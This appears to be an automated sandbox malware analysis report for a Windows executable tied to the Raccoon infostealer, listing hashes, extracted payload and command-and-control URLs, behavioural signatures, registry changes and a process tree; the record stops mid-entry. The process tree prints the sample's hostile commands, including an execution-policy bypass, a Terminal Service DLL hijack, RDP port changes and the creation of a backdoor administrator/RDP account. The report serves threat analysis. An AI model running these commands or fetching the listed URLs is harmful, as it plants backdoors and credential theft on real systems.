Analysis
- max time kernel: 60s
- max time network: 151s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 04-06-2021 08:04

Static task: static1

Behavioral task: behavioral1
- Sample: 798f0fce3485b678647690e3fa01b6be.exe
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: 798f0fce3485b678647690e3fa01b6be.exe
- Resource: win10v20210410
General
- Target: 798f0fce3485b678647690e3fa01b6be.exe
- Size: 567KB
- MD5: 798f0fce3485b678647690e3fa01b6be
- SHA1: 538cba8492b57c83bb21a28dc33cbcfd77058b01
- SHA256: 8fa841c71a956755f6f393ca92a04d0a6950343a7a765a3035f4581dda198488
- SHA512: 6ffaa58a03c159aecd3c86b9f1199a94c8b97dddfdf0eef1aaa528dba78b4ad8c66019bde1b2119e9cef961442e5ef3c2b95cb3b723829ba744de64b18404da9
Malware Config

Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted
- raccoon
- 89ac909b803bacbc6cc523520599c4b9c029b033
- url4cnc: https://tttttt.me/jdiamond13
Signatures

- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

- Blocklisted process makes network request (9 IoCs)
  flow | pid | process
  20 | 3532 | powershell.exe
  22 | 3532 | powershell.exe
  23 | 3532 | powershell.exe
  24 | 3532 | powershell.exe
  26 | 3532 | powershell.exe
  28 | 3532 | powershell.exe
  30 | 3532 | powershell.exe
  32 | 3532 | powershell.exe
  34 | 3532 | powershell.exe

- Downloads MZ/PE file

- Executes dropped EXE (1 IoCs)
  pid | process
  2152 | XfkRrAZJGQ.exe
- Modifies RDP port number used by Windows (1 TTPs)

- Sets DLL path for service in the registry (2 TTPs)

- resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx

- Loads dropped DLL (8 IoCs)
  pid | process
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  2388 | 798f0fce3485b678647690e3fa01b6be.exe
  1304 |
  1304 |
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials, among other things.

- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

- Drops file in Program Files directory (4 IoCs)
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  description | ioc | process
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jgpyxi3k.l5s.ps1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA60A.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA62C.tmp | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA61B.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA63C.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA5EA.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_brq31ar5.avx.psm1 | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Delays execution with timeout.exe (1 IoCs)
  pid | process
  1380 | timeout.exe
- Modifies data under HKEY_USERS (64 IoCs)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)

- Runs net.exe

- Script User-Agent (4 IoCs)
  Uses a user-agent string associated with a script host/environment.
  description | flow | ioc
  HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 23 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 24 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 26 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid | process
  3820 | powershell.exe
  3820 | powershell.exe
  3820 | powershell.exe
  3748 | powershell.exe
  3748 | powershell.exe
  3748 | powershell.exe
  2704 | powershell.exe
  2704 | powershell.exe
  2704 | powershell.exe
  2304 | powershell.exe
  2304 | powershell.exe
  2304 | powershell.exe
  3820 | powershell.exe
  3820 | powershell.exe
  3820 | powershell.exe
  3532 | powershell.exe
  3532 | powershell.exe
  3532 | powershell.exe

- Suspicious behavior: LoadsDriver (2 IoCs)
  pid | process
  628 |
  628 |
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 3820 | powershell.exe
  Token: SeDebugPrivilege | 3748 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3748 | powershell.exe
  Token: SeSecurityPrivilege | 3748 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3748 | powershell.exe
  Token: SeLoadDriverPrivilege | 3748 | powershell.exe
  Token: SeSystemProfilePrivilege | 3748 | powershell.exe
  Token: SeSystemtimePrivilege | 3748 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3748 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3748 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3748 | powershell.exe
  Token: SeBackupPrivilege | 3748 | powershell.exe
  Token: SeRestorePrivilege | 3748 | powershell.exe
  Token: SeShutdownPrivilege | 3748 | powershell.exe
  Token: SeDebugPrivilege | 3748 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3748 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3748 | powershell.exe
  Token: SeUndockPrivilege | 3748 | powershell.exe
  Token: SeManageVolumePrivilege | 3748 | powershell.exe
  Token: 33 | 3748 | powershell.exe
  Token: 34 | 3748 | powershell.exe
  Token: 35 | 3748 | powershell.exe
  Token: 36 | 3748 | powershell.exe
  Token: SeDebugPrivilege | 2704 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2704 | powershell.exe
  Token: SeSecurityPrivilege | 2704 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2704 | powershell.exe
  Token: SeLoadDriverPrivilege | 2704 | powershell.exe
  Token: SeSystemProfilePrivilege | 2704 | powershell.exe
  Token: SeSystemtimePrivilege | 2704 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2704 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2704 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2704 | powershell.exe
  Token: SeBackupPrivilege | 2704 | powershell.exe
  Token: SeRestorePrivilege | 2704 | powershell.exe
  Token: SeShutdownPrivilege | 2704 | powershell.exe
  Token: SeDebugPrivilege | 2704 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2704 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2704 | powershell.exe
  Token: SeUndockPrivilege | 2704 | powershell.exe
  Token: SeManageVolumePrivilege | 2704 | powershell.exe
  Token: 33 | 2704 | powershell.exe
  Token: 34 | 2704 | powershell.exe
  Token: 35 | 2704 | powershell.exe
  Token: 36 | 2704 | powershell.exe
  Token: SeDebugPrivilege | 2304 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2304 | powershell.exe
  Token: SeSecurityPrivilege | 2304 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2304 | powershell.exe
  Token: SeLoadDriverPrivilege | 2304 | powershell.exe
  Token: SeSystemProfilePrivilege | 2304 | powershell.exe
  Token: SeSystemtimePrivilege | 2304 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2304 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2304 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2304 | powershell.exe
  Token: SeBackupPrivilege | 2304 | powershell.exe
  Token: SeRestorePrivilege | 2304 | powershell.exe
  Token: SeShutdownPrivilege | 2304 | powershell.exe
  Token: SeDebugPrivilege | 2304 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2304 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2304 | powershell.exe
  Token: SeUndockPrivilege | 2304 | powershell.exe
  Token: SeManageVolumePrivilege | 2304 | powershell.exe
  Token: 33 | 2304 | powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  source pid -> target pid | source process -> target process
  2388 -> 2152 | 798f0fce3485b678647690e3fa01b6be.exe -> XfkRrAZJGQ.exe
  2388 -> 2152 | 798f0fce3485b678647690e3fa01b6be.exe -> XfkRrAZJGQ.exe
  2388 -> 3952 | 798f0fce3485b678647690e3fa01b6be.exe -> cmd.exe
  2388 -> 3952 | 798f0fce3485b678647690e3fa01b6be.exe -> cmd.exe
  2388 -> 3952 | 798f0fce3485b678647690e3fa01b6be.exe -> cmd.exe
  3952 -> 1380 | cmd.exe -> timeout.exe
  3952 -> 1380 | cmd.exe -> timeout.exe
  3952 -> 1380 | cmd.exe -> timeout.exe
  2152 -> 3820 | XfkRrAZJGQ.exe -> powershell.exe
  2152 -> 3820 | XfkRrAZJGQ.exe -> powershell.exe
  3820 -> 2892 | powershell.exe -> csc.exe
  3820 -> 2892 | powershell.exe -> csc.exe
  2892 -> 3732 | csc.exe -> cvtres.exe
  2892 -> 3732 | csc.exe -> cvtres.exe
  3820 -> 3748 | powershell.exe -> powershell.exe
  3820 -> 3748 | powershell.exe -> powershell.exe
  3820 -> 2704 | powershell.exe -> powershell.exe
  3820 -> 2704 | powershell.exe -> powershell.exe
  3820 -> 2304 | powershell.exe -> powershell.exe
  3820 -> 2304 | powershell.exe -> powershell.exe
  3820 -> 1212 | powershell.exe -> reg.exe
  3820 -> 1212 | powershell.exe -> reg.exe
  3820 -> 1120 | powershell.exe -> reg.exe
  3820 -> 1120 | powershell.exe -> reg.exe
  3820 -> 4088 | powershell.exe -> reg.exe
  3820 -> 4088 | powershell.exe -> reg.exe
  3820 -> 2148 | powershell.exe -> net.exe
  3820 -> 2148 | powershell.exe -> net.exe
  2148 -> 3784 | net.exe -> net1.exe
  2148 -> 3784 | net.exe -> net1.exe
  3820 -> 744 | powershell.exe -> cmd.exe
  3820 -> 744 | powershell.exe -> cmd.exe
  744 -> 1592 | cmd.exe -> cmd.exe
  744 -> 1592 | cmd.exe -> cmd.exe
  1592 -> 3152 | cmd.exe -> net.exe
  1592 -> 3152 | cmd.exe -> net.exe
  3152 -> 752 | net.exe -> net1.exe
  3152 -> 752 | net.exe -> net1.exe
  3820 -> 3548 | powershell.exe -> cmd.exe
  3820 -> 3548 | powershell.exe -> cmd.exe
  3548 -> 1492 | cmd.exe -> cmd.exe
  3548 -> 1492 | cmd.exe -> cmd.exe
  1492 -> 2284 | cmd.exe -> net.exe
  1492 -> 2284 | cmd.exe -> net.exe
  2284 -> 2396 | net.exe -> net1.exe
  2284 -> 2396 | net.exe -> net1.exe
  2616 -> 2728 | cmd.exe -> net.exe
  2616 -> 2728 | cmd.exe -> net.exe
  2728 -> 796 | net.exe -> net1.exe
  2728 -> 796 | net.exe -> net1.exe
  3948 -> 2148 | cmd.exe -> net.exe
  3948 -> 2148 | cmd.exe -> net.exe
  2148 -> 2752 | net.exe -> net1.exe
  2148 -> 2752 | net.exe -> net1.exe
  3288 -> 744 | cmd.exe -> net.exe
  3288 -> 744 | cmd.exe -> net.exe
  744 -> 3784 | net.exe -> net1.exe
  744 -> 3784 | net.exe -> net1.exe
  3212 -> 1772 | cmd.exe -> net.exe
  3212 -> 1772 | cmd.exe -> net.exe
  1772 -> 3532 | net.exe -> net1.exe
  1772 -> 3532 | net.exe -> net1.exe
  1380 -> 3764 | cmd.exe -> net.exe
  1380 -> 3764 | cmd.exe -> net.exe
Processes

Each entry gives the image path, the command line, the process-tree depth in brackets, and the signatures that fired on that process.

[1] C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.cmdline"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp" "c:\Users\Admin\AppData\Local\Temp\jacslsk4\CSC78E3A215782F48DD9CB5172249BAE1F.TMP"

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\reg.exe
          Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

      [4] C:\Windows\system32\reg.exe
          Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

      [4] C:\Windows\system32\net.exe
          Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

      [4] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\cmd.exe
            Command line: cmd /c net start rdpdr
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net.exe
              Command line: net start rdpdr
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 start rdpdr

      [4] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\cmd.exe
            Command line: cmd /c net start TermService
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net.exe
              Command line: net start TermService
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 start TermService

      [4] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

      [4] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\798f0fce3485b678647690e3fa01b6be.exe"
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\timeout.exe
        Command line: timeout /T 10 /NOBREAK
        - Delays execution with timeout.exe

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user wgautilacc b1mq90yo /add
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe user wgautilacc b1mq90yo /add
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user wgautilacc b1mq90yo /add

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
